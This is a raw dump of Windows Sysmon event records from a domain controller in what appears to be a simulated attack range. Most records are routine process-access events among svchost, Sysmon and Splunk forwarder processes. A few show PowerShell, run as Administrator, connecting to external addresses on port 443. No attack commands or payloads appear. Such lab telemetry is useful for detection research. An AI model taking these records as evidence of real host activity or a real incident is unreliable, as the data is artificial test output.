13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8594-5FCF-CB00-000000009101}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8594-5FCF-CB00-000000009101}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.719{10ACEC4A-8594-5FCF-CB00-000000009101}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:26.810{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50373-false168.61.186.235-443https 11241100x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:28.297{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bw3utsni.wdr.ps12020-12-08 13:54:28.297 10341000x80000000000000004085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.749{10ACEC4A-8595-5FCF-CC00-000000009101}49081388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000004084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:27.592{10ACEC4A-8588-5FCF-C800-000000009101}4396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50374-false152.199.19.161-443https 10341000x80000000000000004083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8595-5FCF-CC00-000000009101}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8595-5FCF-CC00-000000009101}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8595-5FCF-CC00-000000009101}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:29.593{10ACEC4A-8595-5FCF-CC00-000000009101}4908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory 